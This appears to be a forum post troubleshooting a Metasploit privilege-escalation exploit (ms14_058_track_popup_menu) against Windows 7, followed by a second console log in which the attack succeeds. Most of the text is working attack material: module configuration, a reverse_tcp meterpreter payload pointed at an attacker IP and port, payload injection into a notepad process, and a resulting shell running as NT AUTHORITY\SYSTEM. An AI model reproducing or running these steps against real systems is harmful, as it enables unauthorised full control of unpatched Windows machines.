30 Dec

Windows privilege escalation exploit

Hi, I’m having troubles with exploit/windows/local/ms14_058_track_popup_menu.

Here is some info:

meterpreter > sysinfo
Computer        : WORKSTATION1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > getuid
Server username: CONTOSO\allenbrewer
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms14_058_track_popup_menu) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms14_058_track_popup_menu) > set LPORT 28746
LPORT => 28746
msf exploit(ms14_058_track_popup_menu) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set TARGET 1
TARGET => 1
msf exploit(ms14_058_track_popup_menu) > set SESSION 3
SESSION => 3
msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
ExitOnSession => false
msf exploit(ms14_058_track_popup_menu) > exploit -j
[*] Exploit running as background job.
[*] Launching notepad to host the exploit...
[+] Process 2268 launched.
[*] Reflectively injecting the exploit DLL into 2268...
[*] Injecting exploit into 2268...
[*] Exploit injected. Injecting payload into 2268...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

[nothing (no shell) comes back]

The win32k.sys product version on the target machine is 6.1.7601.17514.

"[*] win32k.sys file version: 6.1.7601.17514 branch: 17"

 

Now we can get SYSTEM privilege, Thanks.

Host Name: NFS-001
OS Name: Microsoft Windows 7 Home Premium
OS Version: 6.1.7601 Service Pack 1 Build 7601

msf > use exploit/windows/local/ms14_058_track_popup_menu 
msf exploit(ms14_058_track_popup_menu) > sessions -l

Active sessions
===============

  Id  Type                   Information            Connection
  --  ----                   -----------            ----------
  1   meterpreter x86/win32  nfs-001\nfs @ NFS-001  192.168.108.113:4444 -> 192.168.108.197:2735 (192.168.108.197)

msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run

[*] Started reverse handler on 192.168.108.113:4444 
[*] Launching notepad to host the exploit...
[+] Process 2732 launched.
[*] Reflectively injecting the exploit DLL into 2732...
[*] Injecting exploit into 2732...
[*] Exploit injected. Injecting payload into 2732...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (770048 bytes) to 192.168.108.197
[*] Meterpreter session 2 opened (192.168.108.113:4444 -> 192.168.108.197:2787) at 2015-02-10 07:46:21 +0000

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Original Link

Comments are closed.